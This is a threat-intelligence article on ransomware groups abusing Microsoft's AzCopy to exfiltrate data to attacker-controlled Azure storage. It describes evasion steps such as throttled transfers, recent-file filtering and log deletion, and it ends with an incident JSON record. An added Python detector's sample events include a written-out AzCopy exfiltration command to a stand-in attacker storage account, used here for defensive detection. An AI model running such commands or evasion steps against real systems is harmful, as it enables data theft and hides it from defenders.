Rhysida and Microsoft: AzCopy Utility Misused for Data Exfiltration in Ongoing Ransomware Attacks

Ransomware Groups Abuse Microsoft’s AzCopy for Stealthy Data Exfiltration

Ransomware operators are exploiting Microsoft’s trusted Azure data transfer tool, AzCopy, to covertly exfiltrate sensitive data before encryption. By leveraging this legitimate utility, commonly used for cloud migrations and backups, attackers evade detection, blending malicious activity into routine IT operations.

How the Attack Works
AzCopy, a command-line utility for moving large datasets to and from Azure Storage, is rarely flagged by endpoint detection and response (EDR) solutions due to its widespread corporate trust. Threat actors, including groups like BianLian and Rhysida, use AzCopy to bulk-upload stolen files to attacker-controlled Azure Blob storage via HTTPS connections to domains like *.blob.core.windows.net, which often bypass firewall restrictions.

Attackers gain access through compromised Azure credentials or storage keys, then generate Shared Access Signature (SAS) tokens embedded with permissions and time windows to execute transfers without interactive logins. To avoid detection, they throttle transfer speeds using the --cap-mbps flag and filter files with --include-after to target recent, high-value data.

Evasion and Detection Challenges
AzCopy’s use of legitimate cloud infrastructure and standard HTTPS traffic makes it difficult to distinguish from normal operations. In some cases, exfiltration went undetected by endpoint security tools, with attackers deleting local log files (%USERPROFILE%\.azcopy) to erase evidence. Traditional detection methods, which focus on third-party exfiltration tools, often miss these "living-off-the-land" attacks.

Mitigation and Response
Security teams must monitor for anomalous AzCopy activity, such as off-hours transfers or unusual data volumes under service accounts. User and Entity Behavior Analytics (UEBA) can flag abnormal file access, while network monitoring should restrict direct internet access from servers to known endpoints. Application control policies can limit AzCopy execution to approved hosts and accounts. Incident response plans should include steps to revoke SAS tokens, rotate keys, and coordinate with cloud providers to mitigate data loss.
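One way to turn the monitoring guidance above into detection logic, as an added example that is not part of the original article: it scores EDR/Sysmon-style process-creation events for the indicators the article lists (AzCopy on a host outside the approved set, a destination storage account outside the known set, a SAS `sig=` on the command line, the --cap-mbps and --include-after flags, off-hours execution) and never copies the SAS signature into the alert. Because the article notes that attackers delete the local %USERPROFILE%\.azcopy logs, the input is process telemetry forwarded off-host, not AzCopy's own logs; the sample events, allow-lists, business hours and scoring weights are all constructed assumptions.

```python
import re
from datetime import datetime, timezone
from urllib.parse import urlparse, parse_qs

# Constructed EDR/Sysmon-style process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"ts": "2026-03-07T02:14:09+00:00", "host": "FS01", "user": "svc-backup",
     "image": r"C:\Tools\azcopy.exe",
     "cmd": r'azcopy.exe copy D:\Finance "https://ex4mpl3.blob.core.windows.net/in?sv=2022-11-02&sp=rw&sig=AAAA" --recursive --cap-mbps 20 --include-after 2026-02-01'},
    {"ts": "2026-03-06T11:02:41+00:00", "host": "MIG02", "user": "it-admin",
     "image": r"C:\Program Files\azcopy\azcopy.exe",
     "cmd": r"azcopy.exe copy \\nas\share https://corpstore.blob.core.windows.net/migration --recursive"},
    {"ts": "2026-03-06T13:30:00+00:00", "host": "WS17", "user": "jdoe",
     "image": r"C:\Windows\System32\notepad.exe", "cmd": "notepad.exe notes.txt"},
]

# Assumed allow-lists (from the app-control policy / CMDB in practice) and business hours.
APPROVED_HOSTS = {"MIG02"}
APPROVED_ACCOUNTS = {"corpstore.blob.core.windows.net"}
BUSINESS_HOURS = range(7, 19)  # 07:00-18:59 UTC
URL_RE = re.compile(r'https://[\w.-]+\.blob\.core\.windows\.net/[^\s"]*')

def score_event(ev):
    """Score one event; returns (score, reasons). SAS signatures are never copied into reasons."""
    if not ev["image"].lower().endswith("azcopy.exe"):
        return 0, []
    score, reasons, cmd = 0, [], ev["cmd"]
    if ev["host"] not in APPROVED_HOSTS:
        score += 3; reasons.append(f"azcopy run on non-approved host {ev['host']}")
    for url in URL_RE.findall(cmd):
        p = urlparse(url)
        if p.hostname not in APPROVED_ACCOUNTS:
            score += 3; reasons.append(f"transfer to unknown storage account {p.hostname}")
        if "sig" in parse_qs(p.query):
            score += 1; reasons.append("SAS token on command line (sig=<redacted>)")
    for flag, why in (("--cap-mbps", "throttled transfer"), ("--include-after", "recent-file filter")):
        if flag in cmd:
            score += 1; reasons.append(f"{flag} ({why})")
    hour = datetime.fromisoformat(ev["ts"]).astimezone(timezone.utc).hour
    if hour not in BUSINESS_HOURS:
        score += 2; reasons.append(f"off-hours execution at {hour:02d}:00 UTC")
    return score, reasons

def triage(events, threshold=5):
    """Return an alert per event scoring at or above threshold (command line deliberately omitted)."""
    scored = ((ev, *score_event(ev)) for ev in events)
    return [{"host": ev["host"], "user": ev["user"], "score": s, "reasons": r}
            for ev, s, r in scored if s >= threshold]
```

On the constructed events only the svc-backup transfer from FS01 alerts; the approved migration from MIG02 scores zero, which is the point of pairing the indicator list with host and storage-account allow-lists rather than alerting on every AzCopy run.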

As ransomware groups increasingly weaponize trusted cloud tools, organizations must adapt detection strategies to account for legitimate utilities being turned against them.

Source: https://gbhackers.com/azcopy-utility-misused/

Cyber Threat Intelligence ® cybersecurity rating report: https://www.rankiteo.com/company/cyber-threat-intel

Microsoft Security cybersecurity rating report: https://www.rankiteo.com/company/microsoft-security

{
  "id": "CYBMIC1772619962",
  "linkid": "cyber-threat-intel, microsoft-security",
  "type": "Cyber Attack",
  "date": "3/2026",
  "severity": "100",
  "impact": "5",
  "explanation": "Attack threatening the organization's existence"
}
{
  "affected_entities": [{"type": "Organizations using Azure and AzCopy"}],
  "attack_vector": "Compromised Azure credentials or storage keys, Shared Access Signature (SAS) tokens",
  "data_breach": {
    "data_encryption": true,
    "data_exfiltration": true,
    "sensitivity_of_data": "High",
    "type_of_data_compromised": "Sensitive data, high-value files"
  },
  "description": "Ransomware operators are exploiting Microsoft’s trusted Azure data transfer tool, AzCopy, to covertly exfiltrate sensitive data before encryption. By leveraging this legitimate utility commonly used for cloud migrations and backups, attackers evade detection, blending malicious activity into routine IT operations.",
  "impact": {
    "data_compromised": "Sensitive data",
    "operational_impact": "Potential data loss and encryption disruption",
    "systems_affected": "Azure Blob storage, corporate IT infrastructure"
  },
  "initial_access_broker": {
    "entry_point": "Compromised Azure credentials or storage keys",
    "high_value_targets": "Recent, high-value data"
  },
  "lessons_learned": "Ransomware groups are increasingly weaponizing trusted cloud tools like AzCopy, requiring organizations to adapt detection strategies to account for legitimate utilities being turned against them.",
  "motivation": "Data exfiltration for ransomware extortion",
  "post_incident_analysis": {
    "corrective_actions": [
      "Enhanced monitoring for AzCopy activity",
      "Restriction of AzCopy execution",
      "Network-level controls for cloud storage access"
    ],
    "root_causes": "Exploitation of trusted cloud tools (AzCopy) and lack of detection for legitimate utility abuse"
  },
  "ransomware": {
    "data_encryption": true,
    "data_exfiltration": true,
    "ransomware_strain": ["BianLian", "Rhysida"]
  },
  "recommendations": [
    "Monitor for anomalous AzCopy activity (e.g., off-hours transfers, unusual data volumes)",
    "Use User and Entity Behavior Analytics (UEBA) to flag abnormal file access",
    "Restrict direct internet access from servers to known endpoints",
    "Implement application control policies to limit AzCopy execution to approved hosts and accounts",
    "Revoke SAS tokens and rotate keys as part of incident response"
  ],
  "references": [{"source": "Cyber Incident Description"}],
  "response": {
    "containment_measures": ["Revoke SAS tokens", "Rotate Azure storage keys", "Coordinate with cloud providers"],
    "enhanced_monitoring": "User and Entity Behavior Analytics (UEBA), network monitoring",
    "remediation_measures": ["Monitor anomalous AzCopy activity", "Restrict direct internet access from servers", "Limit AzCopy execution to approved hosts and accounts"]
  },
  "threat_actor": ["BianLian", "Rhysida"],
  "title": "Ransomware Groups Abuse Microsoft’s AzCopy for Stealthy Data Exfiltration",
  "type": "Ransomware"
}